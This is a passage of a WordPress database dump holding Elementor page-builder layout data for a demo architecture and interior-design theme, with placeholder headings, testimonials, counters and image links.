right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3079,4749,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3080,4749,'_elementor_pro_version','3.8.1'),(3081,4749,'_elementor_css','a:6:{s:4:\"time\";i:1685009709;s:5:\"fonts\";a:1:{i:0;s:4:\"Reey\";}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3082,4750,'_wp_page_template','elementor_header_footer'),(3083,4750,'_elementor_edit_mode','builder'),(3084,4750,'_elementor_template_type','wp-page'),(3085,4750,'_elementor_version','3.8.1'),(3086,4750,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"LOREM IPSUM\",\"title\":\"LOREM IPSUM\\n\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Redesign Life<\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Mike Hardson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_family\":\"Reey\",\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":